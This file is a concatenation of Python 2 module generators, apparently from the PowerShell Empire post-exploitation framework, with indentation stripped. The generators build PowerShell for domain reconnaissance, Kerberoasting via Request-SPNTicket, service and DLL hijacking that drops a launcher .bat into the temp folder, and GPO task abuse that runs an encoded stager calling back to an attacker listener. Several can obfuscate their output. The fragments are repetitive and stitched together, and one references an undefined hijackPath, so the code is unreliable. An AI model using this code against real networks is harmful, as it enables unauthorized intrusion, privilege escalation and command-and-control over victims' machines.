def generate(self, obfuscate=False, obfuscationCommand=""):
moduleName = self.info["Name"]
# read in the common powerview.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
# get just the code needed for the specified function
script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
script += moduleName + " "
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script
def generate(self):
moduleName = self.info["Name"]
# read in the common powerup.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/PowerUp.ps1"
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
# get just the code needed for the specified function
script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
script += moduleName + " "
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
return script
def generate(self):
moduleName = self.info["Name"]
# read in the common powerview.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
try:
f = open(moduleSource, "r")
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
# get just the code needed for the specified function
script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
script += moduleName + " "
for option, values in self.options.iteritems():
if option.lower() != "agent":
if values["Value"] and values["Value"] != "":
if values["Value"].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values["Value"])
script += (
'| ConvertTo-Csv -NoTypeInformation | Out-String | %{$_ + "`n"};"`n' + str(moduleName) + ' completed!"'
)
return script
def generate(self):
moduleName = self.info["Name"]
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
command = "/c \""+launcher+"\""
if command == "":
return ""
else:
# read in the common powerview.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
# get just the code needed for the specified function
script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
script += moduleName + " -Command cmd -CommandArguments '"+command+"' -Force"
for option,values in self.options.iteritems():
if option.lower() in ["taskname", "taskdescription", "taskauthor", "gponame", "gpodisplayname", "domain", "domaincontroller"]:
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " '" + str(values['Value']) + "'"
script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleName = self.info["Name"]
# read in the common powerup.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/PowerUp.ps1"
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " +
str(moduleSource))
return ""
moduleCode = f.read()
f.close()
# get just the code needed for the specified function
script = helpers.generate_dynamic_powershell_script(
moduleCode, moduleName)
# extract all of our options
serviceName = self.options['ServiceName']['Value']
listenerName = self.options['Listener']['Value']
if not self.mainMenu.listeners.is_listener_empire(listenerName):
print helpers.color("[!] Empire listener required!")
return ""
# generate the .bat launcher code to write out to the specified location
l = self.mainMenu.stagers.stagers['launcher_bat']
l.options['Listener']['Value'] = self.options['Listener']['Value']
l.options['UserAgent']['Value'] = self.options['UserAgent']['Value']
l.options['Proxy']['Value'] = self.options['Proxy']['Value']
l.options['ProxyCreds']['Value'] = self.options['ProxyCreds']['Value']
l.options['Delete']['Value'] = "True"
launcherCode = l.generate()
# PowerShell code to write the launcher.bat out
script += "$tempLoc = \"$env:temp\debug.bat\""
script += "\n$batCode = @\"\n" + launcherCode + "\"@\n"
script += "$batCode | Out-File -Encoding ASCII $tempLoc ;\n"
script += "\"Launcher bat written to $tempLoc `n\";\n"
if launcherCode == "":
print helpers.color("[!] Error in launcher .bat generation.")
return ""
script += "Invoke-ServiceCMD -ServiceName \"" + serviceName + "\" -CMD \"C:\Windows\System32\cmd.exe /C `\"$env:Temp\debug.bat`\"\""
if obfuscate:
script = helpers.obfuscate(psScript=script,
installPath=self.mainMenu.installPath,
obfuscationCommand=obfuscationCommand)
return script
def generate(self):
# read in the common powerup.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/PowerUp.ps1"
try:
f = open(moduleSource, "r")
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
serviceName = self.options["ServiceName"]["Value"]
listenerName = self.options["Listener"]["Value"]
if not self.mainMenu.listeners.is_listener_empire(listenerName):
print helpers.color("[!] Empire listener required!")
return ""
script = helpers.generate_dynamic_powershell_script(moduleCode, "Write-ServiceEXECMD")
# generate the .bat launcher code to write out to the specified location
l = self.mainMenu.stagers.stagers["launcher_bat"]
l.options["Listener"]["Value"] = self.options["Listener"]["Value"]
l.options["UserAgent"]["Value"] = self.options["UserAgent"]["Value"]
l.options["Proxy"]["Value"] = self.options["Proxy"]["Value"]
l.options["ProxyCreds"]["Value"] = self.options["ProxyCreds"]["Value"]
if self.options["Delete"]["Value"].lower() == "true":
l.options["Delete"]["Value"] = "True"
else:
l.options["Delete"]["Value"] = "False"
launcherCode = l.generate()
# PowerShell code to write the launcher.bat out
script += '$tempLoc = "$env:temp\debug.bat"'
script += '\n$batCode = @"\n' + launcherCode + '"@\n'
script += "$batCode | Out-File -Encoding ASCII $tempLoc ;\n"
script += '"Launcher bat written to $tempLoc `n";\n'
if launcherCode == "":
print helpers.color("[!] Error in launcher .bat generation.")
return ""
else:
script += (
'\nWrite-ServiceEXECMD -ServiceName "'
+ serviceName
+ '" -CMD "C:\Windows\System32\cmd.exe /C $tempLoc"'
)
return script
def generate(self):
moduleName = self.info["Name"]
# read in the common powerup.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/PowerUp.ps1"
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
# get just the code needed for the specified function
script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
# extract all of our options
serviceName = self.options['ServiceName']['Value']
listenerName = self.options['Listener']['Value']
if not self.mainMenu.listeners.is_listener_empire(listenerName):
print helpers.color("[!] Empire listener required!")
return ""
# generate the .bat launcher code to write out to the specified location
l = self.mainMenu.stagers.stagers['launcher_bat']
l.options['Listener']['Value'] = self.options['Listener']['Value']
l.options['UserAgent']['Value'] = self.options['UserAgent']['Value']
l.options['Proxy']['Value'] = self.options['Proxy']['Value']
l.options['ProxyCreds']['Value'] = self.options['ProxyCreds']['Value']
l.options['Delete']['Value'] = "True"
launcherCode = l.generate()
# PowerShell code to write the launcher.bat out
script += "$tempLoc = \"$env:temp\debug.bat\""
script += "\n$batCode = @\"\n" + launcherCode + "\"@\n"
script += "$batCode | Out-File -Encoding ASCII $tempLoc ;\n"
script += "\"Launcher bat written to $tempLoc `n\";\n"
if launcherCode == "":
print helpers.color("[!] Error in launcher .bat generation.")
return ""
script += "Invoke-ServiceCMD -ServiceName \""+serviceName+"\" -CMD \"C:\Windows\System32\cmd.exe /C `\"$env:Temp\debug.bat`\"\""
return script
def generate(self):
moduleName = self.info["Name"]
# read in the common powerup.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/powerup/Write-HijackDll.ps1"
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
# get just the code needed for the specified function
script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
batPath = "\\".join(hijackPath.split("\\")[0:-1]) + "\debug.bat"
script += moduleName + " "
# extract all of our options
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
if not self.mainMenu.listeners.is_listener_empire(listenerName):
print helpers.color("[!] Empire listener required!")
return ""
# generate the launcher code
launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
if launcher == "":
print helpers.color("[!] Error in launcher command generation.")
return ""
else:
outFile = self.options['HijackPath']['Value']
script += " -Command \"%s\"" % (launcher)
script += " -OutputFile %s" % (outFile)
script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleName = self.info["Name"]
# read in the common powerview.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
# get just the code needed for the specified function
script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
pscript = ""
expand = False
value_to_expand = ""
for option,values in self.options.iteritems():
if option.lower() != "agent" and option.lower() != "expandobject":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
pscript += " -" + str(option)
else:
pscript += " -" + str(option) + " " + str(values['Value'])
if option.lower() == "expandobject" and values['Value']:
expand = True
value_to_expand += values['Value']
if expand:
script += "(" + moduleName + " " + pscript + ")." + "'" + value_to_expand + "'" + ' | fl | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
else:
script += moduleName + " " + pscript + ' | fl | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed! Use ExpandObject option to expand one of the objects above such as \'System Access\'"'
if obfuscate:
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script
def generate(self):
moduleName = self.info["Name"]
# read in the common powerview.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
# get just the code needed for the specified function
script = helpers.generate_dynamic_powershell_script(moduleCode, ["Get-NetUser", "Request-SPNTicket"])
script += ' Get-NetUser | Request-SPNTicket | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
return script